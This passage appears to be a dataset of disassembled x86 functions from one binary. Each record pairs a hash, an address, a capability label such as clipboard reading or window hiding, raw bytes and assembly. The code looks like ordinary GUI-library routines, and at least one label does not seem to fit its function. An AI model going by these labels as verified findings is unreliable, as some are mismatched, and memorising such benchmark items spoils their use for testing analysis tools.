"mov eax, esi",
"mov dl, 0x14",
"call fcn.004b9860",
"lea esi, [esi]",
"mov eax, esi",
"call fcn.004b9530",
"mov bl, al",
"mov al, bl",
"pop edi",
"pop esi",
"pop ebx",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4d65d0
|
[
"Hide graphical window"
] |
5589e58d6424fc538945fc8b45fc837824007502eb3aa1c07056008b55fc8b80700100003b42247402eb25a1c070560080b81c010000007402eb15a1a07456008b15a07456008b12ff526c8b55fc89028b5dfca1a07456008b15a07456008b12ff526c3b037405e9de000000a1c070560080b81c010000007405e9cb000000a1a07456008b15a07456008b12ff526ce85c540700a1c070560083b870010000007502eb6c6a106a00a1c07056008b8070010000ffb054020000a1c07056008b8070010000ffb048020000a1c07056008b8070010000ffb02c0100006a008b45fcff30e8c9b5f2ffa1c07056008b8070010000e8e915020084c07502eb136a00a1c0705600e8d7acf4ff50e861b5f2ff908b45fcff700c8b45fcff700868120100008b45fcff30e8c5b1f2ff8b55fc8b522089420c8b45fcc6402800a1c0705600e8dbe1f4ffe99e0000008b45fc837824007502eb4d8b45fc8b15c07056008b40243b82700100007402eb378b45fcff700c8b45fcff700868120100008b45fcff30e86ab1f2ff8b55fc8b522089420c8b45fcc6402800a1c0705600e880e1f4ffeb468b45fc837824007502eb3b8b45fc8b4024f7808c040000080000007502eb278b45fc8b4020c7400c010000008b45fcc6402800a1a07456008b15a07456008b12ff928c0000005b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 4]",
"push ebx",
"mov dword [ebp - 4], eax",
"mov eax, dword [ebp - 4]",
"cmp dword [eax + 0x24], 0",
"jne 0x4d65e6",
"jmp 0x4d6620",
"mov eax, dword [0x5670c0]",
"mov edx, dword [ebp - 4]",
"mov eax, dword [eax + 0x170]",
"cmp eax, dword [edx + 0x24]",
"je 0x4d65fb",
"jmp 0x4d6620",
"mov eax, dword [0x5670c0]",
"cmp byte [eax + 0x11c], 0",
"je 0x4d660b",
"jmp 0x4d6620",
"mov eax, dword [0x5674a0]",
"mov edx, dword [0x5674a0]",
"mov edx, dword [edx]",
"call dword [edx + 0x6c]",
"mov edx, dword [ebp - 4]",
"mov dword [edx], eax",
"mov ebx, dword [ebp - 4]",
"mov eax, dword [0x5674a0]",
"mov edx, dword [0x5674a0]",
"mov edx, dword [edx]",
"call dword [edx + 0x6c]",
"cmp eax, dword [ebx]",
"je 0x4d663c",
"jmp 0x4d671a",
"mov eax, dword [0x5670c0]",
"cmp byte [eax + 0x11c], 0",
"je 0x4d664f",
"jmp 0x4d671a",
"mov eax, dword [0x5674a0]",
"mov edx, dword [0x5674a0]",
"mov edx, dword [edx]",
"call dword [edx + 0x6c]",
"call fcn.0054bac0",
"mov eax, dword [0x5670c0]",
"cmp dword [eax + 0x170], 0",
"jne 0x4d6674",
"jmp 0x4d66e0",
"push 0x10",
"push 0",
"mov eax, dword [0x5670c0]",
"mov eax, dword [eax + 0x170]",
"push dword [eax + 0x254]",
"mov eax, dword [0x5670c0]",
"mov eax, dword [eax + 0x170]",
"push dword [eax + 0x248]",
"mov eax, dword [0x5670c0]",
"mov eax, dword [eax + 0x170]",
"push dword [eax + 0x12c]",
"push 0",
"mov eax, dword [ebp - 4]",
"push dword [eax]",
"call sub.user32.dll_SetWindowPos",
"mov eax, dword [0x5670c0]",
"mov eax, dword [eax + 0x170]",
"call fcn.004f7cb0",
"test al, al",
"jne 0x4d66cd",
"jmp 0x4d66e0",
"push 0",
"mov eax, dword [0x5670c0]",
"call fcn.004213b0",
"push eax",
"call sub.user32.dll_ShowWindow",
"nop",
"mov eax, dword [ebp - 4]",
"push dword [eax + 0xc]",
"mov eax, dword [ebp - 4]",
"push dword [eax + 8]",
"push 0x112",
"mov eax, dword [ebp - 4]",
"push dword [eax]",
"call sub.user32.dll_DefWindowProcA",
"mov edx, dword [ebp - 4]",
"mov edx, dword [edx + 0x20]",
"mov dword [edx + 0xc], eax",
"mov eax, dword [ebp - 4]",
"mov byte [eax + 0x28], 0",
"mov eax, dword [0x5670c0]",
"call fcn.004248f0",
"jmp 0x4d67b8",
"mov eax, dword [ebp - 4]",
"cmp dword [eax + 0x24], 0",
"jne 0x4d6725",
"jmp 0x4d6772",
"mov eax, dword [ebp - 4]",
"mov edx, dword [0x5670c0]",
"mov eax, dword [eax + 0x24]",
"cmp eax, dword [edx + 0x170]",
"je 0x4d673b",
"jmp 0x4d6772",
"mov eax, dword [ebp - 4]",
"push dword [eax + 0xc]",
"mov eax, dword [ebp - 4]",
"push dword [eax + 8]",
"push 0x112",
"mov eax, dword [ebp - 4]",
"push dword [eax]",
"call sub.user32.dll_DefWindowProcA",
"mov edx, dword [ebp - 4]",
"mov edx, dword [edx + 0x20]",
"mov dword [edx + 0xc], eax",
"mov eax, dword [ebp - 4]",
"mov byte [eax + 0x28], 0",
"mov eax, dword [0x5670c0]",
"call fcn.004248f0",
"jmp 0x4d67b8",
"mov eax, dword [ebp - 4]",
"cmp dword [eax + 0x24], 0",
"jne 0x4d677d",
"jmp 0x4d67b8",
"mov eax, dword [ebp - 4]",
"mov eax, dword [eax + 0x24]",
"test dword [eax + 0x48c], 8",
"jne 0x4d6791",
"jmp 0x4d67b8",
"mov eax, dword [ebp - 4]",
"mov eax, dword [eax + 0x20]",
"mov dword [eax + 0xc], 1",
"mov eax, dword [ebp - 4]",
"mov byte [eax + 0x28], 0",
"mov eax, dword [0x5674a0]",
"mov edx, dword [0x5674a0]",
"mov edx, dword [edx]",
"call dword [edx + 0x8c]",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4dd460
|
[
"Read clipboard data"
] |
5589e58d6424f4538945f88955fcc645f4008b45f8ff70f8e8d348f2ff8b55f88942ec8b45f88378ec007502eb6e8b45f8ff70ece88741f2ff8b55f88942e48b45f88378e4007f02eb528b45f8ff70ece87b41f2ff8b55f88942e831c06840d44d005568a042410064ff306489208b45f88b50e88b45f88b48e48b45fc8b5dfc8b1bff938400000031c05a83c40c64891089e8e848ffffffc645f4018a45f45b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0xc]",
"push ebx",
"mov dword [ebp - 8], eax",
"mov dword [ebp - 4], edx",
"mov byte [ebp - 0xc], 0",
"mov eax, dword [ebp - 8]",
"push dword [eax - 8]",
"call sub.user32.dll_GetClipboardData",
"mov edx, dword [ebp - 8]",
"mov dword [edx - 0x14], eax",
"mov eax, dword [ebp - 8]",
"cmp dword [eax - 0x14], 0",
"jne 0x4dd48e",
"jmp 0x4dd4fc",
"mov eax, dword [ebp - 8]",
"push dword [eax - 0x14]",
"call sub.kernel32.dll_GlobalSize",
"mov edx, dword [ebp - 8]",
"mov dword [edx - 0x1c], eax",
"mov eax, dword [ebp - 8]",
"cmp dword [eax - 0x1c], 0",
"jg 0x4dd4aa",
"jmp 0x4dd4fc",
"mov eax, dword [ebp - 8]",
"push dword [eax - 0x14]",
"call sub.kernel32.dll_GlobalLock",
"mov edx, dword [ebp - 8]",
"mov dword [edx - 0x18], eax",
"xor eax, eax",
"push fcn.004dd440",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 8]",
"mov edx, dword [eax - 0x18]",
"mov eax, dword [ebp - 8]",
"mov ecx, dword [eax - 0x1c]",
"mov eax, dword [ebp - 4]",
"mov ebx, dword [ebp - 4]",
"mov ebx, dword [ebx]",
"call dword [ebx + 0x84]",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.004dd440",
"mov byte [ebp - 0xc], 1",
"mov al, byte [ebp - 0xc]",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4dd800
|
[
"Write clipboard data"
] |
5589e58d6424c853568945f88955fcc745e800000000c745e400000000c745c800000000c745cc0000000031c068d0d74d005568a042410064ff30648920ba01000000b8b4a15800e873f6f2ff8945f4ba01000000b8b4a15800e861f6f2ff8945f031c068b0d74d005568a042410064ff30648920a184865d008b4df48b55fcff1580865d006a006a008b45f48b55f48b12ff526c8b45fc83f8010f8cdf02000083e8010f84b201000083e801741183e80b0f84a4010000e9c3020000ba01000000b8b0d65900b9b0d65900ff91bc0000008945ec31c068a0d74d005568a042410064ff306489208b55f48b45ec8b4dec8b09ff91cc0000008b45f88b40f4ba000000008b4df88b49f48b09ff91e00100008945e031c06870d74d005568a042410064ff30648920ff75e0e82d4cf2ff8945dc8b45ec8b55ec8b12ff9288000000508b45ec8b55ec8b12ff929800000050ff75e0e8f44bf2ff8945d4ff75d4ff75dce8564ff2ff8945d88b45ec8b55ec8b12ff921401000084c07502eb138b45ec8b55ec8b12ff92180100008945d0eb07c745d0000000006a008b45ec8b55ec8b12ff9298000000508b45ec8b55ec8b12ff9288000000508b45ece81db9fbff89c389d8e8e44efcff506a006a008b45ec8b55ec8b12ff9298000000508b45ec8b55ec8b12ff928800000050ff75d06a006a00682000cc008b45f88b40f48b55dcb9000000008b5df88b5bf48b1bff93e8040000ff75d8ff75dce89e4ef2ffff75dce8c64bf2ffff75d4ff75fce80b43f2ff31c05a83c40c64891089e8e82bfdffff31c05a83c40c64891089e8e84bfdffffe9360100008b45f48b55f48b12ff527083fa007f100f8cfe00000083f8007705e9f40000008b45f48b55f48b12ff527089c28d45e466b90000e8cbbbf2ff8b45f48b55f48b12ff527089c38d45e4e89660f2ff89c28b45f48b4df48b3189d9ff9680000000837dfc0d7402eb628b55e485d274038b52fc8b45e485c07505b8f0425d008d4dcce85ef5f4ff8b45cc8d55e8e863d3f2ff8b45e8ba00000000e806ccf2ffa9ffffffff7502eb218b4de885c974058b49fcd1e9d1e18b55e88b45f08b5df08b1bff938400000089f6eb3a8b45e48d55c8e8afa4f4ff8b55c88d45e4e884aef2ff837de4007502eb1c8b4de485c974038b49fc8b55e48b45f08b5df08b1bff9384000000906a006a008b45f08b55f08b12ff526c908b4df08b55fc8b45f8e882000000eb108b4df48b55fc8b45f8e87200000089f631c05a83c40c64891089e8e810fcffff31c05a83c40c64891089e8e820fcffff5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x38]",
"push ebx",
"push esi",
"mov dword [ebp - 8], eax",
"mov dword [ebp - 4], edx",
"mov dword [ebp - 0x18], 0",
"mov dword [ebp - 0x1c], 0",
"mov dword [ebp - 0x38], 0",
"mov dword [ebp - 0x34], 0",
"xor eax, eax",
"push fcn.004dd7d0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov edx, 1",
"mov eax, 0x58a1b4",
"call fcn.0040cec0",
"mov dword [ebp - 0xc], eax",
"mov edx, 1",
"mov eax, 0x58a1b4",
"call fcn.0040cec0",
"mov dword [ebp - 0x10], eax",
"xor eax, eax",
"push fcn.004dd7b0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [0x5d8684]",
"mov ecx, dword [ebp - 0xc]",
"mov edx, dword [ebp - 4]",
"call dword [0x5d8680]",
"push 0",
"push 0",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov edx, dword [edx]",
"call dword [edx + 0x6c]",
"mov eax, dword [ebp - 4]",
"cmp eax, 1",
"jl 0x4ddb80",
"sub eax, 1",
"je 0x4dda5c",
"sub eax, 1",
"je 0x4dd8c0",
"sub eax, 0xb",
"je 0x4dda5c",
"jmp 0x4ddb80",
"mov edx, 1",
"mov eax, 0x59d6b0",
"mov ecx, 0x59d6b0",
"call dword [ecx + 0xbc]",
"mov dword [ebp - 0x14], eax",
"xor eax, eax",
"push fcn.004dd7a0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 0x14]",
"mov ecx, dword [ebp - 0x14]",
"mov ecx, dword [ecx]",
"call dword [ecx + 0xcc]",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax - 0xc]",
"mov edx, 0",
"mov ecx, dword [ebp - 8]",
"mov ecx, dword [ecx - 0xc]",
"mov ecx, dword [ecx]",
"call dword [ecx + 0x1e0]",
"mov dword [ebp - 0x20], eax",
"xor eax, eax",
"push fcn.004dd770",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"push dword [ebp - 0x20]",
"call sub.gdi32.dll_CreateCompatibleDC",
"mov dword [ebp - 0x24], eax",
"mov eax, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x14]",
"mov edx, dword [edx]",
"call dword [edx + 0x88]",
"push eax",
"mov eax, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x14]",
"mov edx, dword [edx]",
"call dword [edx + 0x98]",
"push eax",
"push dword [ebp - 0x20]",
"call sub.gdi32.dll_CreateCompatibleBitmap",
"mov dword [ebp - 0x2c], eax",
"push dword [ebp - 0x2c]",
"push dword [ebp - 0x24]",
"call sub.gdi32.dll_SelectObject",
"mov dword [ebp - 0x28], eax",
"mov eax, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x14]",
"mov edx, dword [edx]",
"call dword [edx + 0x114]",
"test al, al",
"jne 0x4dd981",
"jmp 0x4dd994",
"mov eax, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x14]",
"mov edx, dword [edx]",
"call dword [edx + 0x118]",
"mov dword [ebp - 0x30], eax",
"jmp 0x4dd99b",
"mov dword [ebp - 0x30], 0",
"push 0",
"mov eax, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x14]",
"mov edx, dword [edx]",
"call dword [edx + 0x98]",
"push eax",
"mov eax, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x14]",
"mov edx, dword [edx]",
"call dword [edx + 0x88]",
"push eax",
"mov eax, dword [ebp - 0x14]",
"call fcn.004992e0",
"mov ebx, eax",
"mov eax, ebx",
"call fcn.004a28b0",
"push eax",
"push 0",
"push 0",
"mov eax, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x14]",
"mov edx, dword [edx]",
"call dword [edx + 0x98]",
"push eax",
"mov eax, dword [ebp - 0x14]",
"mov edx, dword [ebp - 0x14]",
"mov edx, dword [edx]",
"call dword [edx + 0x88]",
"push eax",
"push dword [ebp - 0x30]",
"push 0",
"push 0",
"push 0xcc0020",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax - 0xc]",
"mov edx, dword [ebp - 0x24]",
"mov ecx, 0",
"mov ebx, dword [ebp - 8]",
"mov ebx, dword [ebx - 0xc]",
"mov ebx, dword [ebx]",
"call dword [ebx + 0x4e8]",
"push dword [ebp - 0x28]",
"push dword [ebp - 0x24]",
"call sub.gdi32.dll_SelectObject",
"push dword [ebp - 0x24]",
"call sub.gdi32.dll_DeleteDC",
"push dword [ebp - 0x2c]",
"push dword [ebp - 4]",
"call sub.user32.dll_SetClipboardData",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.004dd770",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.004dd7a0",
"jmp 0x4ddb90",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov edx, dword [edx]",
"call dword [edx + 0x70]",
"cmp edx, 0",
"jg 0x4dda7c",
"jl 0x4ddb70",
"cmp eax, 0",
"ja 0x4dda7c",
"jmp 0x4ddb70",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov edx, dword [edx]",
"call dword [edx + 0x70]",
"mov edx, eax",
"lea eax, [ebp - 0x1c]",
"mov cx, 0",
"call fcn.00409660",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov edx, dword [edx]",
"call dword [edx + 0x70]",
"mov ebx, eax",
"lea eax, [ebp - 0x1c]",
"call fcn.00403b40",
"mov edx, eax",
"mov eax, dword [ebp - 0xc]",
"mov ecx, dword [ebp - 0xc]",
"mov esi, dword [ecx]",
"mov ecx, ebx",
"call dword [esi + pe_nt_image_headers32]",
"cmp dword [ebp - 4], 0xd",
"je 0x4ddac4",
"jmp 0x4ddb26",
"mov edx, dword [ebp - 0x1c]",
"test edx, edx",
"je 0x4ddace",
"mov edx, dword [edx - 4]",
"mov eax, dword [ebp - 0x1c]",
"test eax, eax",
"jne 0x4ddada",
"mov eax, 0x5d42f0",
"lea ecx, [ebp - 0x34]",
"call fcn.0042d040",
"mov eax, dword [ebp - 0x34]",
"lea edx, [ebp - 0x18]",
"call fcn.0040ae50",
"mov eax, dword [ebp - 0x18]",
"mov edx, 0",
"call fcn.0040a700",
"test eax, 0xffffffff",
"jne 0x4ddb03",
"jmp 0x4ddb24",
"mov ecx, dword [ebp - 0x18]",
"test ecx, ecx",
"je 0x4ddb0f",
"mov ecx, dword [ecx - 4]",
"shr ecx, 1",
"shl ecx, 1",
"mov edx, dword [ebp - 0x18]",
"mov eax, dword [ebp - 0x10]",
"mov ebx, dword [ebp - 0x10]",
"mov ebx, dword [ebx]",
"call dword [ebx + 0x84]",
"mov esi, esi",
"jmp 0x4ddb60",
"mov eax, dword [ebp - 0x1c]",
"lea edx, [ebp - 0x38]",
"call fcn.00427fe0",
"mov edx, dword [ebp - 0x38]",
"lea eax, [ebp - 0x1c]",
"call fcn.004089c0",
"cmp dword [ebp - 0x1c], 0",
"jne 0x4ddb44",
"jmp 0x4ddb60",
"mov ecx, dword [ebp - 0x1c]",
"test ecx, ecx",
"je 0x4ddb4e",
"mov ecx, dword [ecx - 4]",
"mov edx, dword [ebp - 0x1c]",
"mov eax, dword [ebp - 0x10]",
"mov ebx, dword [ebp - 0x10]",
"mov ebx, dword [ebx]",
"call dword [ebx + 0x84]",
"nop",
"push 0",
"push 0",
"mov eax, dword [ebp - 0x10]",
"mov edx, dword [ebp - 0x10]",
"mov edx, dword [edx]",
"call dword [edx + 0x6c]",
"nop",
"mov ecx, dword [ebp - 0x10]",
"mov edx, dword [ebp - 4]",
"mov eax, dword [ebp - 8]",
"call fcn.004ddc00",
"jmp 0x4ddb90",
"mov ecx, dword [ebp - 0xc]",
"mov edx, dword [ebp - 4]",
"mov eax, dword [ebp - 8]",
"call fcn.004ddc00",
"mov esi, esi",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.004dd7b0",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.004dd7d0",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4ddc00
|
[
"Write clipboard data"
] |
5589e58d6424d4538945f48955fc894df8c745d400000000c745e40000000031c068e0db4d005568a042410064ff306489208b45f88b55f88b12ff5270506a02e8bb39f2ff8945f0837df0007405e97d0000008b45f88b55f88b12ff52708945d88955dcff75dcff75d88d45e4e8bea7f8ff8b45e48945e88b45f08d55d4e8fda6f8ff8b45d48945dce8b2aef8ff89c3b818685a0050ff75e86a006a006a006a006a006a006a006a006a006a006a006a006a006a008b4ddcba30685a0089d8e82cc3f8ff8b45f4c640f000eb5aff75f0e85839f2ff8945ec31c068c0db4d005568a042410064ff306489208b45f88b55f88b12ff527089c18b55ec8b45f88b5df88b1bff938000000031d25883c40c64890289e8e8a4feffffff75f0ff75fce81940f2ff31d25883c40c64890289e8e8a9feffff5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x2c]",
"push ebx",
"mov dword [ebp - 0xc], eax",
"mov dword [ebp - 4], edx",
"mov dword [ebp - 8], ecx",
"mov dword [ebp - 0x2c], 0",
"mov dword [ebp - 0x1c], 0",
"xor eax, eax",
"push fcn.004ddbe0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 8]",
"mov edx, dword [edx]",
"call dword [edx + 0x70]",
"push eax",
"push 2",
"call sub.kernel32.dll_GlobalAlloc",
"mov dword [ebp - 0x10], eax",
"cmp dword [ebp - 0x10], 0",
"je 0x4ddc53",
"jmp 0x4ddcd0",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 8]",
"mov edx, dword [edx]",
"call dword [edx + 0x70]",
"mov dword [ebp - 0x28], eax",
"mov dword [ebp - 0x24], edx",
"push dword [ebp - 0x24]",
"push dword [ebp - 0x28]",
"lea eax, [ebp - 0x1c]",
"call fcn.00468430",
"mov eax, dword [ebp - 0x1c]",
"mov dword [ebp - 0x18], eax",
"mov eax, dword [ebp - 0x10]",
"lea edx, [ebp - 0x2c]",
"call fcn.00468380",
"mov eax, dword [ebp - 0x2c]",
"mov dword [ebp - 0x24], eax",
"call fcn.00468b40",
"mov ebx, eax",
"mov eax, str._DataSize",
"push eax",
"push dword [ebp - 0x18]",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"mov ecx, dword [ebp - 0x24]",
"mov edx, str.TWin32WidgetSet.ClipboardGetOwnerShip_DataHandle",
"mov eax, ebx",
"call fcn.00469ff0",
"mov eax, dword [ebp - 0xc]",
"mov byte [eax - 0x10], 0",
"jmp 0x4ddd27",
"push dword [ebp - 0x10]",
"call sub.kernel32.dll_GlobalLock",
"mov dword [ebp - 0x14], eax",
"xor eax, eax",
"push fcn.004ddbc0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 8]",
"mov edx, dword [ebp - 8]",
"mov edx, dword [edx]",
"call dword [edx + 0x70]",
"mov ecx, eax",
"mov edx, dword [ebp - 0x14]",
"mov eax, dword [ebp - 8]",
"mov ebx, dword [ebp - 8]",
"mov ebx, dword [ebx]",
"call dword [ebx + pe_nt_image_headers32]",
"xor edx, edx",
"pop eax",
"add esp, 0xc",
"mov dword fs:[edx], eax",
"mov eax, ebp",
"call fcn.004ddbc0",
"push dword [ebp - 0x10]",
"push dword [ebp - 4]",
"call sub.user32.dll_SetClipboardData",
"xor edx, edx",
"pop eax",
"add esp, 0xc",
"mov dword fs:[edx], eax",
"mov eax, ebp",
"call fcn.004ddbe0",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4eae50
|
[
"Resolve function by parsing pe exports"
] |
5589e58d6424ac5356578945f48955f8894dfc837df8017402eb0d8b45f48b55f4ff52348945f490837df4007402eb08e9a502000031c06807b14e0055682046410064ff30648920c745bcffffffff8b45f48b55fc8950088b45f48b5008b86c6c5a00e8251ff2ff84c07502eb1f8b55f48b45f48b400889420c8b45f48b400ce8d8b500008b55f4894210eb0a8b45f4c74010000000008b45f48b40088b55f48b52088b12ff92080300008b55f48842148b45f48b40088b80800000008d55e48b4df48b49088b89800000008b09ff517c8b45f48b55e48950248b55f48b45e88942208b45f48b55ec8950288b55f48b45f089422c8b45f48b50088b45f48db8b00000008d7260b904000000f3a58b45f48b55f48b80b00000003b82b80000007402eb398b45f48b55f48b80b40000003b82bc0000007402eb238b45f48b40088d55ace8f53001008b45f48db8b00000008d75acb904000000f3a589f68b45f48b50088b4df48b42748981c00000008b42788981c40000008b45f483780c007505e97f000000807d08007502eb77c745ac00000000c745b000000000c745b4ffffff1fc745b8ffffff1f8d7dd08d75acb904000000f3a58b45f48b400c8d55d08b4df48b490c8b09ff915c0300008b55f48b45d08942348b45f48b55d48950308b55d8b8ffffff1f29d08b55f48942388b55dcb8ffffff1f29d08b55f489423ce980000000c745e0ffffffff908b45e08d40018945e08b45f48b55e0c744903000000000837de0037302ebe18b45f483b8c0000000007402eb4b8b45f483b8c4000000007402eb3d8b45f48b40088b80140200008d55c08b4df48b49088b89140200008b09ff91600100008b55f48b45c88982c00000008b55f48b45cc8982c400000089f6c745bc01000000837df4007502eb15837df8007502eb0d8b45f48b55f48b12ff524489f631c05a83c40c648910eb238b45f45f5e5b89ec5dc20400
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x54]",
"push ebx",
"push esi",
"push edi",
"mov dword [ebp - 0xc], eax",
"mov dword [ebp - 8], edx",
"mov dword [ebp - 4], ecx",
"cmp dword [ebp - 8], 1",
"je 0x4eae6b",
"jmp 0x4eae78",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"call dword [edx + 0x34]",
"mov dword [ebp - 0xc], eax",
"nop",
"cmp dword [ebp - 0xc], 0",
"je 0x4eae80",
"jmp 0x4eae88",
"jmp 0x4eb12a",
"xor eax, eax",
"push 0x4eb107",
"push ebp",
"push 0x414620",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov dword [ebp - 0x44], 0xffffffff",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 4]",
"mov dword [eax + 8], edx",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [eax + 8]",
"mov eax, 0x5a6c6c",
"call fcn.0040cde0",
"test al, al",
"jne 0x4eaec1",
"jmp 0x4eaee0",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 8]",
"mov dword [edx + 0xc], eax",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 0xc]",
"call fcn.004f64b0",
"mov edx, dword [ebp - 0xc]",
"mov dword [edx + 0x10], eax",
"jmp 0x4eaeea",
"mov eax, dword [ebp - 0xc]",
"mov dword [eax + 0x10], 0",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 8]",
"mov edx, dword [ebp - 0xc]",
"mov edx, dword [edx + 8]",
"mov edx, dword [edx]",
"call dword [edx + 0x308]",
"mov edx, dword [ebp - 0xc]",
"mov byte [edx + 0x14], al",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 8]",
"mov eax, dword [eax + 0x80]",
"lea edx, [ebp - 0x1c]",
"mov ecx, dword [ebp - 0xc]",
"mov ecx, dword [ecx + 8]",
"mov ecx, dword [ecx + 0x80]",
"mov ecx, dword [ecx]",
"call dword [ecx + 0x7c]",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0x1c]",
"mov dword [eax + 0x24], edx",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 0x18]",
"mov dword [edx + 0x20], eax",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0x14]",
"mov dword [eax + 0x28], edx",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 0x10]",
"mov dword [edx + 0x2c], eax",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [eax + 8]",
"mov eax, dword [ebp - 0xc]",
"lea edi, [eax + 0xb0]",
"lea esi, [edx + 0x60]",
"mov ecx, 4",
"rep movsd dword es:[edi], dword [esi]",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [eax + 0xb0]",
"cmp eax, dword [edx + 0xb8]",
"je 0x4eaf77",
"jmp 0x4eafb0",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [eax + 0xb4]",
"cmp eax, dword [edx + 0xbc]",
"je 0x4eaf8d",
"jmp 0x4eafb0",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 8]",
"lea edx, [ebp - 0x54]",
"call fcn.004fe090",
"mov eax, dword [ebp - 0xc]",
"lea edi, [eax + 0xb0]",
"lea esi, [ebp - 0x54]",
"mov ecx, 4",
"rep movsd dword es:[edi], dword [esi]",
"mov esi, esi",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [eax + 8]",
"mov ecx, dword [ebp - 0xc]",
"mov eax, dword [edx + 0x74]",
"mov dword [ecx + 0xc0], eax",
"mov eax, dword [edx + 0x78]",
"mov dword [ecx + 0xc4], eax",
"mov eax, dword [ebp - 0xc]",
"cmp dword [eax + 0xc], 0",
"jne 0x4eafd9",
"jmp 0x4eb058",
"cmp byte [ebp + 8], 0",
"jne 0x4eafe1",
"jmp 0x4eb058",
"mov dword [ebp - 0x54], 0",
"mov dword [ebp - 0x50], 0",
"mov dword [ebp - 0x4c], 0x1fffffff",
"mov dword [ebp - 0x48], 0x1fffffff",
"lea edi, [ebp - 0x30]",
"lea esi, [ebp - 0x54]",
"mov ecx, 4",
"rep movsd dword es:[edi], dword [esi]",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 0xc]",
"lea edx, [ebp - 0x30]",
"mov ecx, dword [ebp - 0xc]",
"mov ecx, dword [ecx + 0xc]",
"mov ecx, dword [ecx]",
"call dword [ecx + 0x35c]",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 0x30]",
"mov dword [edx + 0x34], eax",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0x2c]",
"mov dword [eax + 0x30], edx",
"mov edx, dword [ebp - 0x28]",
"mov eax, 0x1fffffff",
"sub eax, edx",
"mov edx, dword [ebp - 0xc]",
"mov dword [edx + 0x38], eax",
"mov edx, dword [ebp - 0x24]",
"mov eax, 0x1fffffff",
"sub eax, edx",
